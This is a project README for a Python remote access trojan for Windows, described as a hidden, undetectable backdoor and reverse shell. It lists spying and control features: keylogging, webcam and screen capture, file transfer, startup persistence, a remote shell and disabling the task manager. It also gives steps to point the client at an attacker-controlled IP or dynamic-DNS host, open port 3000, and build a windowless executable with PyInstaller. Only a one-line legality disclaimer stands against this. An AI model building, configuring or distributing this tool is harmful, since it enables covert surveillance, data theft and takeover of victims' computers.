This program is an opensource, hidden and undetectable backdoor/reverse shell/RAT for Windows made in Python 3 which contains many features such as multi-client support and cross-platform server.
You will needs:
Latest release can be found here.
Currently this program has several features such as:
- Multi-client support
- Cross-platform server
- Built-in keylogger
- Ability to capture screenshots/webcam snapshots
- Ability to upload/download files
- Ability to send messages
- Ability to run at startup
- Ability to browse files
- Ability to dump user info
- Ability to open remote cmd
- Ability to disable task manager
- Ability to shutdown/restart/lock pc
- Checking for multiple instances
- And more...
- Open client with IDLE or any other editor.
- Set your IP address in the quotes on line 8 for
strHost
to use for the server or if you plan to use DNS server, on the line below put in your dns hostname such as:strHost = socket.gethostbyname("myserver113.ddns.net")
. - You must also disable your firewall on the server or configure your firewall to allow port 3000
If you plan on using the program outside of your network, you must port forward port 3000.
For more information please refer to the instructable.
- Install Pyinstaller.
- Open command prompt and run
pyinstaller client.py --exclude-module FixTk --exclude-module tcl --exclude-module tk --exclude-module _tkinter --exclude-module tkinter --exclude-module Tkinter --onefile --windowed
If you need any help at all, feel free to post a "help" issue or a comment on my instructable.
Contributing is encouraged and will help make a better program. Please refer to this before contributing.
This program must be used for legal purposes! I am not responsible for anything you do with it.